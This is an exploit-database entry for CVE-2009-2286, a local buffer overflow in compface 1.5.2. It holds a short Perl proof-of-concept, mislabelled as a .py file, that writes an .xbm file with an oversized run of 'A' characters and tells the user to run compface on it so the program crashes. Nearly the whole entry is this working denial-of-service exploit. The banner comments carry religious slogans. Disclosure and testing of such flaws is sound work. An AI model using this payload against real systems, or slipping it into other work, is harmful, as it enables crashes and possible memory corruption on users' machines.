Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)

Author: metalhoney
type: dos
platform: linux
port: 
date_added: 2009-06-16  
date_updated: 2016-10-27  
verified: 1  
codes: OSVDB-55543;CVE-2009-2286  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8982.py  
#!/usr/bin/perl
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################
# compface <= 1.5.2 bufer overflow p o c
# vuln only excist on debian and ubuntu? - packages.debian.org/compface -
# author: metalhoney ------- metalhoney1@hotmail.com -------
#########################################################################
open(ISLAM,">allah.xbm") or die;
print ISLAM "#define noname_width 48\n#define noname_height 48\n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {\n";
close(ISLAM) or die;
print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n";
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################

# milw0rm.com [2009-06-17]